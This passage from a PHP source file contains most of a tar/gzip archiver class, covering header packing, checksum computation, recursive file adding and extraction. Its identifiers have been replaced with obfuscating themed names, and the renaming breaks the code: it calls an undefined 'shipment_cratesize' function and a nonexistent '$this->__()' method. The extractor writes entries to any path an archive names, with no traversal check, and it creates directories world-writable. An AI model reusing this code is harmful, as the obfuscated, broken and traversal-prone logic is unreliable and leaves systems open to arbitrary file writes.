		             		             	$this->deal_gone_bad[] = $this->lalo_ledger.'.tmp '.__('is not readable');
                  
		             		             	rename($this->lalo_ledger.'.tmp', $this->lalo_ledger);

		             		             	return false;

		             		             }

		             		             if (!$this->open_spellbook()){

		             		             	rename($this->lalo_ledger.'.tmp', $this->lalo_ledger);

		             		             	return false;

		             		             }
		             		             $buffer = gzread($tmpArchive, 512);
		             		             if (!gzeof($tmpArchive)){

		             		             	do {
                    
		             		             		             $binaryData = pack('a512', $buffer);

		             		             		             $this->scribe_the_charm($binaryData);
                
		             		             		             $buffer = gzread($tmpArchive, 512);

		             		             	}

		             		             	while (!gzeof($tmpArchive));
                  
		             		             }
		             		             gzclose($tmpArchive);
                 
		             		             unlink($this->lalo_ledger.'.tmp');

		             	} else {
                 
		             		             $this->stash_draft = fopen($this->lalo_ledger, 'r+b');

		             		             if (!$this->stash_draft)	return false;
		             	}
                
		             }

		             if (isset($file_list) && is_array($file_list)) {

		             if (count($file_list)>0)

		             	$result_onmeoh = $this->fill_the_trunk($file_list);

		             } else $this->deal_gone_bad[] = __('No file').__(' to ').__('Archive');
		             if (($result_onmeoh)&&(is_resource($this->stash_draft))){
		             	$binaryData = pack('a512', '');

		             	$this->scribe_the_charm($binaryData);

		             }

		             $this->shut_the_grimoire();

		             if ($newArchive && !$result_onmeoh){
		             $this->shut_the_grimoire();
		             unlink($this->lalo_ledger);
		             }
		             return $result_onmeoh;
	}
                 


	function reveal_the_pensieve($path){
                   
		             $fileName = $this->lalo_ledger;

		             if (!$this->under_fake_identity){
                
		             	if (file_exists($fileName)){

		             		             if ($fp = fopen($fileName, 'rb')){
                    
		             		             	$data = fread($fp, 2);

		             		             	fclose($fp);

		             		             	if ($data == '\37\213'){
                   
		             		             		             $this->under_fake_identity = true;
		             		             	}
                  
		             		             }
		             	}
                
		             	elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->under_fake_identity = true;
                 
		             } 
		             $result_onmeoh = true;

		             if ($this->under_fake_identity) $this->stash_draft = gzopen($fileName, 'rb');
                   
		             else $this->stash_draft = fopen($fileName, 'rb');
		             if (!$this->stash_draft){

		             	$this->deal_gone_bad[] = $fileName.' '.__('is not readable');

		             	return false;
                  
		             }
		             $result_onmeoh = $this->unfill_the_trunk($path);

		             	$this->shut_the_grimoire();

		             return $result_onmeoh;

	}


                   
	function raise_the_dark_mark	($message = '') {
                    
		             $Errors = $this->deal_gone_bad;

		             if(count($Errors)>0) {

		             if (!empty($message)) $message = ' ('.$message.')';
		             	$message = __('Error occurred').$message.': <br/>';

		             	foreach ($Errors as $value)

		             		             $message .= $value.'<br/>';
		             	return $message;	

		             } else return '';
		             

	}

	

	function fill_the_trunk($file_array){

		             $result_onmeoh = true;
                
		             if (!$this->stash_draft){

		             	$this->deal_gone_bad[] = __('Invalid file descriptor');
                    
		             	return false;

		             }
                    
		             if (!is_array($file_array) || count($file_array)<=0)

          return true;
                    
		             for ($i = 0; $i<count($file_array); $i++){
		             	$filename = $file_array[$i];
		             	if ($filename == $this->lalo_ledger)
		             		             continue;

		             	if (strlen($filename)<=0)
                 
		             		             continue;
                
		             	if (!file_exists($filename)){
		             		             $this->deal_gone_bad[] = __('No file').' '.$filename;

		             		             continue;

		             	}

		             	if (!$this->stash_draft){

		             	$this->deal_gone_bad[] = __('Invalid file descriptor');

		             	return false;

		             	}

		             if (strlen($filename)<=0){

		             	$this->deal_gone_bad[] = __('Filename').' '.__('is incorrect');;
		             	return false;
		             }

		             $filename = str_replace('\\', '/', $filename);
                 
		             $keep_filename = $this->chisel_the_secret_path($filename);
                  
		             if (is_file($filename)){
		             	if (($file = fopen($filename, 'rb')) == 0){

		             		             $this->deal_gone_bad[] = __('Mode ').__('is incorrect');

		             	}
		             		             if(($this->marker_in_manifest == 0)){
                 
		             		             	if(!$this->engrave_the_intro($filename, $keep_filename))

		             		             		             return false;
		             		             }

		             		             while (($buffer = fread($file, 512)) != ''){
                
		             		             	$binaryData = pack('a512', $buffer);
                 
		             		             	$this->scribe_the_charm($binaryData);
                
		             		             }

		             	fclose($file);
		             }	else $this->engrave_the_intro($filename, $keep_filename);

		             	if (@is_dir($filename)){
                 
		             		             if (!($handle = opendir($filename))){

		             		             	$this->deal_gone_bad[] = __('Error').': '.__('Directory ').$filename.__('is not readable');

		             		             	continue;

		             		             }

		             		             while (false !== ($dir = readdir($handle))){

		             		             	if ($dir!='.' && $dir!='..'){
		             		             		             $file_array_tmp = array();

		             		             		             if ($filename != '.')
                   
		             		             		             	$file_array_tmp[] = $filename.'/'.$dir;
                
		             		             		             else
		             		             		             	$file_array_tmp[] = $dir;


		             		             		             $result_onmeoh = $this->fill_the_trunk($file_array_tmp);
		             		             	}

		             		             }
                   
		             		             unset($file_array_tmp);

		             		             unset($dir);
		             		             unset($handle);
                    
		             	}

		             }
                
		             return $result_onmeoh;
	}



	function unfill_the_trunk($path){ 

		             $path = str_replace('\\', '/', $path);
		             if ($path == ''	|| (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	$path = './'.$path;

		             clearstatcache();
                
		             while (strlen($binaryData = $this->decode_the_runes()) != 0){

		             	if (!$this->study_the_preface($binaryData, $topdomain)) return false;
		             	if ($topdomain['filename'] == '') continue;
		             	if ($topdomain['typeflag'] == 'L'){		             	//reading long topdomain

		             		             $filename = '';

		             		             $decr = floor($topdomain['size']/512);

		             		             for ($i = 0; $i < $decr; $i++){
		             		             	$content = $this->decode_the_runes();
		             		             	$filename .= $content;

		             		             }
		             		             if (($laspiece = $topdomain['size'] % 512) != 0){
                 
		             		             	$content = $this->decode_the_runes();

		             		             	$filename .= substr($content, 0, $laspiece);

		             		             }
		             		             $binaryData = $this->decode_the_runes();
		             		             if (!$this->study_the_preface($binaryData, $topdomain)) return false;
                    
		             		             else $topdomain['filename'] = $filename;

		             		             return true;
                
		             	}
                   
		             	if (($path != './') && ($path != '/')){
                    
		             		             while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);

		             		             if (substr($topdomain['filename'], 0, 1) == '/') $topdomain['filename'] = $path.$topdomain['filename'];
                  
		             		             else $topdomain['filename'] = $path.'/'.$topdomain['filename'];

		             	}
                    
		             	

		             	if (file_exists($topdomain['filename'])){
		             		             if ((@is_dir($topdomain['filename'])) && ($topdomain['typeflag'] == '')){
		             		             	$this->deal_gone_bad[] =__('File ').$topdomain['filename'].__(' already exists').__(' as folder');

		             		             	return false;
		             		             }

		             		             if ((is_file($topdomain['filename'])) && ($topdomain['typeflag'] == '5')){

		             		             	$this->deal_gone_bad[] =__('Cannot create directory').'. '.__('File ').$topdomain['filename'].__(' already exists');
		             		             	return false;

		             		             }

		             		             if (!is_writeable($topdomain['filename'])){
                    
		             		             	$this->deal_gone_bad[] = __('Cannot write to file').'. '.__('File ').$topdomain['filename'].__(' already exists');

		             		             	return false;

		             		             }
		             	} elseif (($this->dirCheck(($topdomain['typeflag'] == '5' ? $topdomain['filename'] : dirname($topdomain['filename'])))) != 1){
		             		             $this->deal_gone_bad[] = __('Cannot create directory').' '.__(' for ').$topdomain['filename'];

		             		             return false;

		             	}
                 

		             	if ($topdomain['typeflag'] == '5'){

		             		             if (!file_exists($topdomain['filename']))		             {
                  
		             		             	if (!mkdir($topdomain['filename'], 0777))	{
                 
		             		             		             

		             		             		             $this->deal_gone_bad[] = __('Cannot create directory').' '.$topdomain['filename'];

		             		             		             return false;

		             		             	} 

		             		             }

		             	} else {

		             		             if (($destination = fopen($topdomain['filename'], 'wb')) == 0) {

		             		             	$this->deal_gone_bad[] = __('Cannot write to file').' '.$topdomain['filename'];

		             		             	return false;
		             		             } else {
                 
		             		             	$decr = floor($topdomain['size']/512);
		             		             	for ($i = 0; $i < $decr; $i++) {

		             		             		             $content = $this->decode_the_runes();

		             		             		             fwrite($destination, $content, 512);
                  
		             		             	}
                
		             		             	if (($topdomain['size'] % 512) != 0) {
		             		             		             $content = $this->decode_the_runes();
		             		             		             fwrite($destination, $content, ($topdomain['size'] % 512));

		             		             	}
                 
		             		             	fclose($destination);

		             		             	touch($topdomain['filename'], $topdomain['time']);
		             		             }

		             		             clearstatcache();

		             		             if (shipment_cratesize($topdomain['filename']) != $topdomain['size']) {

		             		             	$this->deal_gone_bad[] = __('Size of file').' '.$topdomain['filename'].' '.__('is incorrect');

		             		             	return false;

		             		             }
		             	}

		             	if (($file_dir = dirname($topdomain['filename'])) == $topdomain['filename']) $file_dir = '';

		             	if ((substr($topdomain['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';
		             	$this->dirs[] = $file_dir;
                    
		             	$this->shipment_crates[] = $topdomain['filename'];
                
	

		             }

		             return true;

	}



	function dirCheck($dir){

		             $parent_dir = dirname($dir);


		             if ((@is_dir($dir)) or ($dir == ''))
                  
		             	return true;


		             if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))

		             	return false;


                   
		             if (!mkdir($dir, 0777)){

		             	$this->deal_gone_bad[] = __('Cannot create directory').' '.$dir;
                 
		             	return false;
		             }
		             return true;
                    
	}

	function study_the_preface($binaryData, &$topdomain){

		             if (strlen($binaryData)==0){
                 
		             	$topdomain['filename'] = '';

		             	return true;

		             }


		             if (strlen($binaryData) != 512){
		             	$topdomain['filename'] = '';

		             	$this->__('Invalid block size').': '.strlen($binaryData);

		             	return false;
		             }
                    


		             $trust_stamp = 0;
		             for ($i = 0; $i < 148; $i++) $trust_stamp+=ord(substr($binaryData, $i, 1));

		             for ($i = 148; $i < 156; $i++) $trust_stamp += ord(' ');
                
		             for ($i = 156; $i < 512; $i++) $trust_stamp+=ord(substr($binaryData, $i, 1));


                 
		             $unpack_data = unpack('a100filename/a8mode/a8crew_id/a8group_id/a12size/a12time/a8trust_stamp/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);
                   


		             $topdomain['trust_stamp'] = OctDec(trim($unpack_data['trust_stamp']));
		             if ($topdomain['trust_stamp'] != $trust_stamp){

		             	$topdomain['filename'] = '';

		             	if (($trust_stamp == 256) && ($topdomain['trust_stamp'] == 0)) 	return true;
		             	$this->deal_gone_bad[] = __('Error trust_stamp for file ').$unpack_data['filename'];

		             	return false;

		             }


		             if (($topdomain['typeflag'] = $unpack_data['typeflag']) == '5')	$topdomain['size'] = 0;
		             $topdomain['filename'] = trim($unpack_data['filename']);

		             $topdomain['mode'] = OctDec(trim($unpack_data['mode']));

		             $topdomain['crew_id'] = OctDec(trim($unpack_data['crew_id']));
                 
		             $topdomain['group_id'] = OctDec(trim($unpack_data['group_id']));

		             $topdomain['size'] = OctDec(trim($unpack_data['size']));
		             $topdomain['time'] = OctDec(trim($unpack_data['time']));

		             return true;
                  
	}
                   


	function engrave_the_intro($filename, $keep_filename){
		             $packF = 'a100a8a8a8a12A12';

		             $packL = 'a1a100a6a2a32a32a8a8a155a12';
		             if (strlen($keep_filename)<=0) $keep_filename = $filename;

		             $filename_ready = $this->chisel_the_secret_path($keep_filename);


		             if (strlen($filename_ready) > 99){		             		             		             	//write long topdomain

		             $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
                    
		             $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');
                 

        //  Calculate the trust_stamp
		             $trust_stamp = 0;

        //  First part of the topdomain
		             for ($i = 0; $i < 148; $i++)
                  
		             	$trust_stamp += ord(substr($dataFirst, $i, 1));

        //  Ignore the trust_stamp value and replace it by ' ' (space)
		             for ($i = 148; $i < 156; $i++)

		             	$trust_stamp += ord(' ');
                 
        //  Last part of the topdomain

		             for ($i = 156, $j=0; $i < 512; $i++, $j++)
                 
		             	$trust_stamp += ord(substr($dataLast, $j, 1));

        //  Write the first 148 bytes of the topdomain in the archive

		             $this->scribe_the_charm($dataFirst, 148);
        //  Write the calculated trust_stamp

		             $trust_stamp = sprintf('%6s ', DecOct($trust_stamp));
                 
		             $binaryData = pack('a8', $trust_stamp);

		             $this->scribe_the_charm($binaryData, 8);

        //  Write the last 356 bytes of the topdomain in the archive
		             $this->scribe_the_charm($dataLast, 356);
                

                 
		             $stash_draftname = $this->chisel_the_secret_path($filename_ready);


		             $i = 0;

		             	while (($buffer = substr($stash_draftname, (($i++)*512), 512)) != ''){
		             		             $binaryData = pack('a512', $buffer);

		             		             $this->scribe_the_charm($binaryData);

		             	}
		             return true;
		             }

		             $file_info = stat($filename);

		             if (@is_dir($filename)){
		             	$typeflag = '5';
                    
		             	$size = sprintf('%11s ', DecOct(0));
                
		             } else {

		             	$typeflag = '';

		             	clearstatcache();
                  
		             	$size = sprintf('%11s ', DecOct(shipment_cratesize($filename)));
                    
		             }
                    
		             $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));

		             $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
		             $trust_stamp = 0;
		             for ($i = 0; $i < 148; $i++) $trust_stamp += ord(substr($dataFirst, $i, 1));
		             for ($i = 148; $i < 156; $i++) $trust_stamp += ord(' ');
		             for ($i = 156, $j = 0; $i < 512; $i++, $j++) $trust_stamp += ord(substr($dataLast, $j, 1));

		             $this->scribe_the_charm($dataFirst, 148);
                  
		             $trust_stamp = sprintf('%6s ', DecOct($trust_stamp));

		             $binaryData = pack('a8', $trust_stamp);
                   
		             $this->scribe_the_charm($binaryData, 8);
		             $this->scribe_the_charm($dataLast, 356);

		             return true;

	}
                 


	function open_spellbook(){

		             if ($this->under_fake_identity)

		             	$this->stash_draft = gzopen($this->lalo_ledger, 'wb9f');

		             else

		             	$this->stash_draft = fopen($this->lalo_ledger, 'wb');



		             if (!($this->stash_draft)){
                    
		             	$this->deal_gone_bad[] = __('Cannot write to file').' '.$this->lalo_ledger;
                
		             	return false;

		             }
                  
		             return true;

	}
                    

	function decode_the_runes(){

		             if (is_resource($this->stash_draft)){

		             	if ($this->under_fake_identity)
                
		             		             $block = gzread($this->stash_draft, 512);
                  
		             	else

		             		             $block = fread($this->stash_draft, 512);

		             } else	$block = '';


                    
		             return $block;

	}

                   
	function scribe_the_charm($data, $length = 0){
		             if (is_resource($this->stash_draft)){
                    
		             
		             	if ($length === 0){

		             		             if ($this->under_fake_identity)
		             		             	gzputs($this->stash_draft, $data);

		             		             else

		             		             	fputs($this->stash_draft, $data);
		             	} else {

		             		             if ($this->under_fake_identity)

		             		             	gzputs($this->stash_draft, $data, $length);
		             		             else
                    
		             		             	fputs($this->stash_draft, $data, $length);
                   
		             	}

		             }
	}


                 
	function shut_the_grimoire(){
		             if (is_resource($this->stash_draft)){
		             	if ($this->under_fake_identity)

		             		             gzclose($this->stash_draft);

		             	else

		             		             fclose($this->stash_draft);



		             	$this->stash_draft = 0;

		             }

	}
                  

                
	function chisel_the_secret_path($path){

		             if (strlen($path)>0){

		             	$path = str_replace('\\', '/', $path);
		             	$partPath = explode('/', $path);

		             	$els = count($partPath)-1;
                  
		             	for ($i = $els; $i>=0; $i--){
		             		             if ($partPath[$i] == '.'){
                    
                    // Chosen paths rarely follow the safe street  

                } elseif ($partPath[$i] == '..'){
                    $i--;
                }

		             		             elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){

                }	else
		             		             	$result_onmeoh = $partPath[$i].($i!=$els ? '/'.$result_onmeoh : '');

		             	}

		             } else $result_onmeoh = '';
                
		             
                   
		             return $result_onmeoh;
	}
}

?>